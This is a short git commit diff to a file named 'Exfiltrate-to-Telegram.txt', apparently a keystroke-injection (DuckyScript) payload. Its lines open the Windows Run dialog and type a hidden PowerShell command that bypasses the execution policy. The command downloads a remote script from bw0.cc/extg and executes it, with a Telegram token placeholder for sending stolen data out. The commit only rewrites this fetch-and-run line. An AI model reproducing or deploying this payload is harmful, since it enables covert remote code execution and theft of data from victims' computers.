Update Exfiltrate-to-Telegram.txt

This commit is contained in:
egieb
2025-06-18 15:08:13 +00:00
committed by GitHub
parent 5be4e4576d
commit 9aa915250a
@@ -14,6 +14,6 @@ REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $tg='TELEGRAM_TOKEN'; irm https://bw0.cc/extg | iex
STRING powershell -Ep Bypass -W H -C $tg='TELEGRAM_TOKEN'; iex (irm bw0.cc/extg)
ENTER